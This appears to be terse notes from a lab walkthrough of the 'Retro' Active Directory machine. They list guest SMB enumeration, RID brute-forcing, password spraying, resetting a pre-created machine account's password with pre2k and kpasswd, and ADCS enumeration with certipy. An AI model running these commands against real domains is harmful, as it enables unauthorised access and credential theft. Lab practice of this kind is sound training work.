Retro

10.10.122.154

rustscan -a ips.txt --ulimit 5000 -- -Pn -sC -sV -oA retro

Open 10.10.122.154:53
Open 10.10.122.154:88
Open 10.10.122.154:135
Open 10.10.122.154:139
Open 10.10.122.154:389
Open 10.10.122.154:445
Open 10.10.122.154:593
Open 10.10.122.154:636
Open 10.10.122.154:3389
Open 10.10.122.154:464
Open 10.10.122.154:9389

commonName=DC.retro.vl

commonName=retro-DC-CA/domainComponent=retro

cme smb ips.txt -u 'a' -p ''

Available Shares as guest user

smbclient.py 'guest:@10.10.122.154'

use Trainees

mget *

exit

Content of Trainees Share

Content of Important.txt

lookupsid.py guest@10.10.122.154

Users Found

cme smb ips.txt -u users.txt -p users.txt --no-bruteforce

cme ldap ips.txt -u 'trainee' -p 'trainee' -M adcs

ADSC Enum

certipy find -vulnerable -username 'trainee' -p 'trainee'  -dc-ip 10.10.122.154

smbclient.py 'trainee:trainee@10.10.122.154'

Finding precreated computer accounts

pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl

cme smb ips.txt -u 'Banking' -p '/usr/share/wordlists/seclists/Passwords/Common-Credentials/common-passwords-win.txt'

OLD Machine Account

pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl

krb5.conf

kpasswd banking$

banking

certipy find -vulnerable -u 'trainee'@retro.vl -p trainee -dc-ip 10.10.82.138

Malleum Knowledge Base

Explorer

Retro

Finding precreated computer accounts

OLD Machine Account

Graph View

Table of Contents